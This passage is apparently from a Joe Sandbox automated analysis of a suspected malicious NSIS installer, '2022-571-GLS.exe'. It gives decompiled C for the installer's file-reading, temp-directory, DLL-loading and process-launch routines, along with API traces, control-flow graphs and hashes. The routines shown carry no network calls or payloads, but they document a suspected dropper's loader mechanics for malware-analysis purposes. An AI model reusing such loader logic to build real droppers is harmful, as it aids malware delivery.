				int _t35;
				long _t36;
				int _t37;
				long _t38;
				int _t40;
				int _t42;
				long _t43;
				long _t44;
				intOrPtr _t51;
				long _t55;
				long _t57;

				_t31 = _a4;
				if(_t31 >= 0) {
					_t51 =  *0x423fd8; // 0x1fe7
					_t44 = _t31 + _t51;
					 *0x417124 = _t44;
					SetFilePointer( *0x409018, _t44, 0, 0); // executed
				}
				_t57 = 4;
				_t32 = E00403059(_t57);
				if(_t32 >= 0) {
					_t35 = ReadFile( *0x409018,  &_a4, _t57,  &_v8, 0); // executed
					if(_t35 == 0 || _v8 != _t57) {
						L23:
						_push(0xfffffffd);
						goto L24;
					} else {
						 *0x417124 =  *0x417124 + _t57;
						_t32 = E00403059(_a4);
						_v12 = _t32;
						if(_t32 >= 0) {
							if(_a12 != 0) {
								_t36 = _a4;
								if(_t36 >= _a16) {
									_t36 = _a16;
								}
								_t37 = ReadFile( *0x409018, _a12, _t36,  &_v8, 0); // executed
								if(_t37 == 0) {
									goto L23;
								} else {
									_t38 = _v8;
									 *0x417124 =  *0x417124 + _t38;
									_v12 = _t38;
									goto L22;
								}
							} else {
								if(_a4 <= 0) {
									L22:
									_t32 = _v12;
								} else {
									while(1) {
										_t55 = 0x4000;
										if(_a4 < 0x4000) {
											_t55 = _a4;
										}
										_t40 = ReadFile( *0x409018, 0x413120, _t55,  &_v8, 0); // executed
										if(_t40 == 0 || _t55 != _v8) {
											goto L23;
										}
										_t42 = WriteFile(_a8, 0x413120, _v8,  &_a16, 0); // executed
										if(_t42 == 0 || _a16 != _t55) {
											_push(0xfffffffe);
											L24:
											_pop(_t32);
										} else {
											_t43 = _v8;
											_v12 = _v12 + _t43;
											_a4 = _a4 - _t43;
											 *0x417124 =  *0x417124 + _t43;
											if(_a4 > 0) {
												continue;
											} else {
												goto L22;
											}
										}
										goto L25;
									}
									goto L23;
								}
							}
						}
					}
				}
				L25:
				return _t32;
			}


















                          0x00402f33
                          0x00402f3d
                          0x00402f3f
                          0x00402f46
                          0x00402f4a
                          0x00402f55
                          0x00402f55
                          0x00402f5d
                          0x00402f5f
                          0x00402f66
                          0x00402f82
                          0x00402f86
                          0x0040304f
                          0x0040304f
                          0x00000000
                          0x00402f95
                          0x00402f98
                          0x00402f9e
                          0x00402fa5
                          0x00402fa8
                          0x00402fb1
                          0x0040301e
                          0x00403024
                          0x00403026
                          0x00403026
                          0x00403038
                          0x0040303c
                          0x00000000
                          0x0040303e
                          0x0040303e
                          0x00403041
                          0x00403047
                          0x00000000
                          0x00403047
                          0x00402fb3
                          0x00402fb6
                          0x0040304a
                          0x0040304a
                          0x00402fbc
                          0x00402fc1
                          0x00402fc1
                          0x00402fc9
                          0x00402fcb
                          0x00402fcb
                          0x00402fdc
                          0x00402fe0
                          0x00000000
                          0x00000000
                          0x00402ff4
                          0x00402ffc
                          0x0040301a
                          0x00403051
                          0x00403051
                          0x00403003
                          0x00403003
                          0x00403006
                          0x00403009
                          0x0040300c
                          0x00403016
                          0x00000000
                          0x00403018
                          0x00000000
                          0x00403018
                          0x00403016
                          0x00000000
                          0x00402ffc
                          0x00000000
                          0x00402fc1
                          0x00402fb6
                          0x00402fb1
                          0x00402fa8
                          0x00402f86
                          0x00403052
                          0x00403056

                          APIs
                          • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,?,?,?,00402EDA,000000FF,00000000,00000000,?,000083E4), ref: 00402F55
                          • ReadFile.KERNELBASE(?,00000004,000083E4,00000000,00000004,00000000,00000000,00000000,?,?,?,00402EDA,000000FF,00000000,00000000,?), ref: 00402F82
                          • ReadFile.KERNELBASE(00413120,00004000,000083E4,00000000,?,?,00402EDA,000000FF,00000000,00000000,?,000083E4), ref: 00402FDC
                          • WriteFile.KERNELBASE(00000000,00413120,000083E4,000000FF,00000000,?,00402EDA,000000FF,00000000,00000000,?,000083E4), ref: 00402FF4
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.305499046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.305491871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305515929.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305527626.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305565989.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305616553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305629363.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305634480.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2022-571-GLS.jbxd
                          Similarity
                          • API ID: File$Read$PointerWrite
                          • String ID: 1A
                          • API String ID: 2113905535-9103686
                          • Opcode ID: dfd426ff9148373ae1b38b35403f472367688ea5597ee74420ff68edd34f8a5f
                          • Instruction ID: 82d5fff184c734a1787b3ae727349c02325da9e894cdbedb842e9025a389ee8f
                          • Opcode Fuzzy Hash: dfd426ff9148373ae1b38b35403f472367688ea5597ee74420ff68edd34f8a5f
                          • Instruction Fuzzy Hash: 9A313871501209FBCF21DF55DD44AAF3BB8EB44765F20403AF904A6291D3389F91DBA9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00403059 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108fileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 445 403059-403082 GetTickCount 446 4031c3-4031cb call 402be9 445->446 447 403088-4030b3 call 403207 SetFilePointer 445->447 452 4031cd-4031d2 446->452 453 4030b8-4030ca 447->453 454 4030cc 453->454 455 4030ce-4030dc call 4031d5 453->455 454->455 458 4030e2-4030ee 455->458 459 4031b5-4031b8 455->459 460 4030f4-4030fa 458->460 459->452 461 403125-403141 call 406184 460->461 462 4030fc-403102 460->462 468 403143-40314b 461->468 469 4031be 461->469 462->461 463 403104-403124 call 402be9 462->463 463->461 471 40314d-403163 WriteFile 468->471 472 40317f-403185 468->472 470 4031c0-4031c1 469->470 470->452 473 403165-403169 471->473 474 4031ba-4031bc 471->474 472->469 475 403187-403189 472->475 473->474 476 40316b-403177 473->476 474->470 475->469 477 40318b-40319e 475->477 476->460 478 40317d 476->478 477->453 479 4031a4-4031b3 SetFilePointer 477->479 478->477 479->446
                          C-Code - Quality: 94%
                          			E00403059(intOrPtr _a4) {
				long _v4;
				void* __ecx;
				intOrPtr _t12;
				intOrPtr _t13;
				signed int _t14;
				void* _t16;
				void* _t17;
				long _t18;
				int _t21;
				intOrPtr _t34;
				long _t35;
				intOrPtr _t37;
				void* _t39;
				long _t40;
				intOrPtr _t46;
				intOrPtr _t53;

				_t35 =  *0x417124; // 0x55c78
				_t37 = _t35 -  *0x40b090 + _a4;
				 *0x423f8c = GetTickCount() + 0x1f4;
				if(_t37 <= 0) {
					L23:
					E00402BE9(1);
					return 0;
				}
				E00403207( *0x41f134);
				SetFilePointer( *0x409018,  *0x40b090, 0, 0); // executed
				 *0x41f130 = _t37;
				 *0x417120 = 0;
				while(1) {
					L2:
					_t12 =  *0x417128; // 0x43015
					_t34 = 0x4000;
					_t13 = _t12 -  *0x41f134;
					if(_t13 <= 0x4000) {
						_t34 = _t13;
					}
					_t14 = E004031D5(0x413120, _t34); // executed
					if(_t14 == 0) {
						break;
					}
					 *0x41f134 =  *0x41f134 + _t34;
					 *0x40b0b0 = 0x413120;
					 *0x40b0b4 = _t34;
					while(1) {
						_t46 =  *0x423f90; // 0x5bf9f8
						if(_t46 != 0 &&  *0x424020 == 0) {
							 *0x417120 =  *0x41f130 -  *0x417124 - _a4 +  *0x40b090;
							E00402BE9(0);
						}
						 *0x40b0b8 = 0x40b120;
						 *0x40b0bc = 0x8000; // executed
						_t16 = E00406184(0x40b098); // executed
						if(_t16 < 0) {
							break;
						}
						_t39 =  *0x40b0b8; // 0x4126c2
						_t40 = _t39 - 0x40b120;
						if(_t40 == 0) {
							__eflags =  *0x40b0b4; // 0x0
							if(__eflags != 0) {
								break;
							}
							__eflags = _t34;
							if(_t34 == 0) {
								break;
							}
							L17:
							_t18 =  *0x417124; // 0x55c78
							if(_t18 -  *0x40b090 + _a4 > 0) {
								goto L2;
							}
							SetFilePointer( *0x409018, _t18, 0, 0); // executed
							goto L23;
						}
						_t21 = WriteFile( *0x409018, 0x40b120, _t40,  &_v4, 0); // executed
						if(_t21 == 0 || _t40 != _v4) {
							_push(0xfffffffe);
							L22:
							_pop(_t17);
							return _t17;
						} else {
							 *0x40b090 =  *0x40b090 + _t40;
							_t53 =  *0x40b0b4; // 0x0
							if(_t53 != 0) {
								continue;
							}
							goto L17;
						}
					}
					_push(0xfffffffd);
					goto L22;
				}
				return _t14 | 0xffffffff;
			}



















                          0x0040305d
                          0x0040306a
                          0x0040307d
                          0x00403082
                          0x004031c3
                          0x004031c5
                          0x00000000
                          0x004031cb
                          0x0040308e
                          0x004030a1
                          0x004030a7
                          0x004030ad
                          0x004030b8
                          0x004030b8
                          0x004030b8
                          0x004030bd
                          0x004030c2
                          0x004030ca
                          0x004030cc
                          0x004030cc
                          0x004030d5
                          0x004030dc
                          0x00000000
                          0x00000000
                          0x004030e2
                          0x004030e8
                          0x004030ee
                          0x004030f4
                          0x004030f4
                          0x004030fa
                          0x0040311a
                          0x0040311f
                          0x00403124
                          0x0040312a
                          0x00403130
                          0x0040313a
                          0x00403141
                          0x00000000
                          0x00000000
                          0x00403143
                          0x00403149
                          0x0040314b
                          0x0040317f
                          0x00403185
                          0x00000000
                          0x00000000
                          0x00403187
                          0x00403189
                          0x00000000
                          0x00000000
                          0x0040318b
                          0x0040318b
                          0x0040319e
                          0x00000000
                          0x00000000
                          0x004031ad
                          0x00000000
                          0x004031ad
                          0x0040315b
                          0x00403163
                          0x004031ba
                          0x004031c0
                          0x004031c0
                          0x00000000
                          0x0040316b
                          0x0040316b
                          0x00403171
                          0x00403177
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040317d
                          0x00403163
                          0x004031be
                          0x00000000
                          0x004031be
                          0x00000000

                          APIs
                          • GetTickCount.KERNEL32 ref: 0040306E
                            • Part of subcall function 00403207: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EB3,000083E4), ref: 00403215
                          • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00402F64,00000004,00000000,00000000,00000000,?,?,?,00402EDA,000000FF,00000000), ref: 004030A1
                          • WriteFile.KERNELBASE(0040B120,004126C2,00000000,00000000,00413120,00004000,?,00000000,?,00402F64,00000004,00000000,00000000,00000000,?,?), ref: 0040315B
                          • SetFilePointer.KERNELBASE(00055C78,00000000,00000000,00413120,00004000,?,00000000,?,00402F64,00000004,00000000,00000000,00000000,?,?), ref: 004031AD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.305499046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.305491871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305515929.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305527626.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305565989.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305616553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305629363.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305634480.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2022-571-GLS.jbxd
                          Similarity
                          • API ID: File$Pointer$CountTickWrite
                          • String ID: 1A
                          • API String ID: 2146148272-9103686
                          • Opcode ID: 0cf6868b9e9647ca11da496d61e231f9210f9a3003146b68b5f630b0a2b16ff6
                          • Instruction ID: 4dd4975a9f59093c3e0d8581b597c69eeb1c8b76cfa1fe2ad7fe21498de3e5f3
                          • Opcode Fuzzy Hash: 0cf6868b9e9647ca11da496d61e231f9210f9a3003146b68b5f630b0a2b16ff6
                          • Instruction Fuzzy Hash: 16418D72518201AFC7109F29EE849673BBDF708356714423BEA60B62E0D7386D098B9D
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004015B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 480 4015b3-4015c6 call 402a0c call 405882 485 4015c8-4015e3 call 405819 CreateDirectoryA 480->485 486 40160a-40160d 480->486 493 401600-401608 485->493 494 4015e5-4015f0 GetLastError 485->494 488 40162d-40217f call 401423 486->488 489 40160f-401628 call 401423 call 405cfb SetCurrentDirectoryA 486->489 501 4028a1-4028b0 488->501 489->501 493->485 493->486 497 4015f2-4015fb GetFileAttributesA 494->497 498 4015fd 494->498 497->493 497->498 498->493
                          C-Code - Quality: 85%
                          			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
				struct _SECURITY_ATTRIBUTES** _t10;
				int _t19;
				struct _SECURITY_ATTRIBUTES* _t20;
				signed char _t22;
				struct _SECURITY_ATTRIBUTES* _t23;
				CHAR* _t25;
				struct _SECURITY_ATTRIBUTES** _t29;
				void* _t30;

				_t23 = __ebx;
				_t25 = E00402A0C(0xfffffff0);
				_t10 = E00405882(_t25);
				_t27 = _t10;
				if(_t10 != __ebx) {
					do {
						_t29 = E00405819(_t27, 0x5c);
						 *_t29 = _t23;
						 *((char*)(_t30 + 0xb)) =  *_t29;
						_t19 = CreateDirectoryA(_t25, _t23); // executed
						if(_t19 == 0) {
							if(GetLastError() != 0xb7) {
								L4:
								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
							} else {
								_t22 = GetFileAttributesA(_t25); // executed
								if((_t22 & 0x00000010) == 0) {
									goto L4;
								}
							}
						}
						_t20 =  *((intOrPtr*)(_t30 + 0xb));
						 *_t29 = _t20;
						_t27 =  &(_t29[0]);
					} while (_t20 != _t23);
				}
				if( *((intOrPtr*)(_t30 - 0x24)) == _t23) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405CFB("C:\\Users\\jones\\AppData\\Local\\Temp", _t25);
					SetCurrentDirectoryA(_t25); // executed
				}
				 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}











                          0x004015b3
                          0x004015ba
                          0x004015bd
                          0x004015c2
                          0x004015c6
                          0x004015c8
                          0x004015d0
                          0x004015d6
                          0x004015d8
                          0x004015db
                          0x004015e3
                          0x004015f0
                          0x004015fd
                          0x004015fd
                          0x004015f2
                          0x004015f3
                          0x004015fb
                          0x00000000
                          0x00000000
                          0x004015fb
                          0x004015f0
                          0x00401600
                          0x00401603
                          0x00401605
                          0x00401606
                          0x004015c8
                          0x0040160d
                          0x0040162d
                          0x0040217a
                          0x0040160f
                          0x00401611
                          0x0040161c
                          0x00401622
                          0x00401622
                          0x004028a4
                          0x004028b0

                          APIs
                            • Part of subcall function 00405882: CharNextA.USER32(4V@,?,C:\,00000000,004058E6,C:\,C:\,?,?,7476F560,00405634,?,C:\Users\user\AppData\Local\Temp\,7476F560), ref: 00405890
                            • Part of subcall function 00405882: CharNextA.USER32(00000000), ref: 00405895
                            • Part of subcall function 00405882: CharNextA.USER32(00000000), ref: 004058A4
                          • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                          • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                          • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                          • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401622
                          Strings
                          • C:\Users\user\AppData\Local\Temp, xrefs: 00401617
                          Memory Dump Source
                          • Source File: 00000000.00000002.305499046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.305491871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305515929.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305527626.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305565989.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305616553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305629363.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305634480.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2022-571-GLS.jbxd
                          Similarity
                          • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                          • String ID: C:\Users\user\AppData\Local\Temp
                          • API String ID: 3751793516-47812868
                          • Opcode ID: 50ec374d6edcfb4941514268ae499aae1e4c08cda85895cc054099465040d3ce
                          • Instruction ID: d0a9f9296d723caddbd0f60560613e174b6a475f07d6f089b0aabedb845a292b
                          • Opcode Fuzzy Hash: 50ec374d6edcfb4941514268ae499aae1e4c08cda85895cc054099465040d3ce
                          • Instruction Fuzzy Hash: CE010832908140AFD7217B755D4497F37B4DE91369724463FF891B22E1C63C0D42962E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0040601D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34libraryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 505 40601d-40603d GetSystemDirectoryA 506 406041-406043 505->506 507 40603f 505->507 508 406053-406055 506->508 509 406045-40604d 506->509 507->506 511 406056-406084 wsprintfA LoadLibraryA 508->511 509->508 510 40604f-406051 509->510 510->511
                          C-Code - Quality: 100%
                          			E0040601D(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x409010; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryA( &_v292); // executed
				return _t14;
			}








                          0x00406034
                          0x0040603d
                          0x0040603f
                          0x0040603f
                          0x00406043
                          0x00406055
                          0x0040604f
                          0x0040604f
                          0x0040604f
                          0x00406059
                          0x0040606d
                          0x0040607d
                          0x00406084

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.305499046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.305491871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305515929.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305527626.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305565989.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305616553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305629363.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305634480.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2022-571-GLS.jbxd
                          Similarity
                          • API ID: DirectoryLibraryLoadSystemwsprintf
                          • String ID: %s%s.dll$\
                          • API String ID: 2200240437-500877883
                          • Opcode ID: ab578b0f6e67864073cc7e0faf31571440b610376f19e1ac75bbbc29e234aff8
                          • Instruction ID: 31df564d024cf24b7dbdd433d12669610400c14d1f093727c30223d65afe2acb
                          • Opcode Fuzzy Hash: ab578b0f6e67864073cc7e0faf31571440b610376f19e1ac75bbbc29e234aff8
                          • Instruction Fuzzy Hash: CBF02B309441095BDF14E764DC0DEFB375CEB08344F0445BBA54BE10D2FA78E8698B98
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00405A01 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 512 405a01-405a0b 513 405a0c-405a36 GetTickCount GetTempFileNameA 512->513 514 405a45-405a47 513->514 515 405a38-405a3a 513->515 517 405a3f-405a42 514->517 515->513 516 405a3c 515->516 516->517
                          C-Code - Quality: 100%
                          			E00405A01(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}








                          0x00405a05
                          0x00405a0b
                          0x00405a0c
                          0x00405a0c
                          0x00405a0d
                          0x00405a14
                          0x00405a1e
                          0x00405a2b
                          0x00405a2e
                          0x00405a36
                          0x00000000
                          0x00000000
                          0x00405a3a
                          0x00000000
                          0x00000000
                          0x00405a3c
                          0x00000000
                          0x00405a3c
                          0x00000000

                          APIs
                          • GetTickCount.KERNEL32 ref: 00405A14
                          • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 00405A2E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.305499046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.305491871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305515929.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305527626.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305565989.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305616553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305629363.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305634480.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2022-571-GLS.jbxd
                          Similarity
                          • API ID: CountFileNameTempTick
                          • String ID: "C:\Users\user\Desktop\2022-571-GLS.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                          • API String ID: 1716503409-390044261
                          • Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                          • Instruction ID: 5b0006bac455ae629d1f86c67115003f625ce1c04593d449782858effb37a924
                          • Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                          • Instruction Fuzzy Hash: 81F020327082087BEB104E49EC44B9B7FADDFC5720F10C12BFA049A1C0C2B0A9488BA9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004058CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 601 4058cf-4058ea call 405cfb call 405882 606 4058f0-4058fd call 405f5d 601->606 607 4058ec-4058ee 601->607 611 405909-40590b 606->611 612 4058ff-405903 606->612 608 405942-405944 607->608 614 405921-40592a lstrlenA 611->614 612->607 613 405905-405907 612->613 613->607 613->611 615 40592c-405940 call 4057ee GetFileAttributesA 614->615 616 40590d-405914 call 405ff6 614->616 615->608 621 405916-405919 616->621 622 40591b-40591c call 405835 616->622 621->607 621->622 622->614
                          C-Code - Quality: 53%
                          			E004058CF(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				long _t16;
				intOrPtr _t18;
				intOrPtr* _t21;
				void* _t22;

				E00405CFB(0x421988, _a4);
				_t21 = E00405882(0x421988);
				if(_t21 != 0) {
					E00405F5D(_t21);
					if(( *0x423f98 & 0x00000080) == 0) {
						L5:
						_t22 = _t21 - 0x421988;
						while(1) {
							_t11 = lstrlenA(0x421988);
							_push(0x421988);
							if(_t11 <= _t22) {
								break;
							}
							_t12 = E00405FF6();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405835(0x421988);
								continue;
							} else {
								goto L1;
							}
						}
						E004057EE();
						_t16 = GetFileAttributesA(??); // executed
						return 0 | _t16 != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}









                          0x004058db
                          0x004058e6
                          0x004058ea
                          0x004058f1
                          0x004058fd
                          0x00405909
                          0x00405909
                          0x00405921
                          0x00405922
                          0x00405929
                          0x0040592a
                          0x00000000
                          0x00000000
                          0x0040590d
                          0x00405914
                          0x0040591c
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00405914
                          0x0040592c
                          0x00405932
                          0x00000000
                          0x00405940
                          0x004058ff
                          0x00405903
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00405903
                          0x004058ec
                          0x00000000

                          APIs
                            • Part of subcall function 00405CFB: lstrcpynA.KERNEL32(?,?,00000400,004032FF,djvgroedvnqvwkorzqvn Setup,NSIS Error), ref: 00405D08
                            • Part of subcall function 00405882: CharNextA.USER32(4V@,?,C:\,00000000,004058E6,C:\,C:\,?,?,7476F560,00405634,?,C:\Users\user\AppData\Local\Temp\,7476F560), ref: 00405890
                            • Part of subcall function 00405882: CharNextA.USER32(00000000), ref: 00405895
                            • Part of subcall function 00405882: CharNextA.USER32(00000000), ref: 004058A4
                          • lstrlenA.KERNEL32(C:\,00000000,C:\,C:\,?,?,7476F560,00405634,?,C:\Users\user\AppData\Local\Temp\,7476F560), ref: 00405922
                          • GetFileAttributesA.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,?,?,7476F560,00405634,?,C:\Users\user\AppData\Local\Temp\,7476F560), ref: 00405932
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.305499046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.305491871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305515929.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305527626.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305565989.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305616553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305629363.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305634480.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2022-571-GLS.jbxd
                          Similarity
                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                          • String ID: C:\
                          • API String ID: 3248276644-3404278061
                          • Opcode ID: e2955dcf029725b2ed1d5fce7c573bfe7ab26ede656e04fe1650c1d49aac5c3f
                          • Instruction ID: 03f6043ec37f77008ca106ed659fbfe74b4750b5f08ac9da600103de26cb934a
                          • Opcode Fuzzy Hash: e2955dcf029725b2ed1d5fce7c573bfe7ab26ede656e04fe1650c1d49aac5c3f
                          • Instruction Fuzzy Hash: 94F02822509E116AC222333A1C09A9F0A19CE86338714453BFC51B22D2DB3C8D53ED7E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0040555B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 624 40555b-405588 CreateProcessA 625 405596-405597 624->625 626 40558a-405593 CloseHandle 624->626 626->625
                          C-Code - Quality: 100%
                          			E0040555B(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x422588->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x422588,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                          0x00405564
                          0x00405580
                          0x00405588
                          0x0040558d
                          0x00000000
                          0x00405593
                          0x00405597

                          APIs
                          • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00422588,Error launching installer), ref: 00405580
                          • CloseHandle.KERNEL32(?), ref: 0040558D
                          Strings
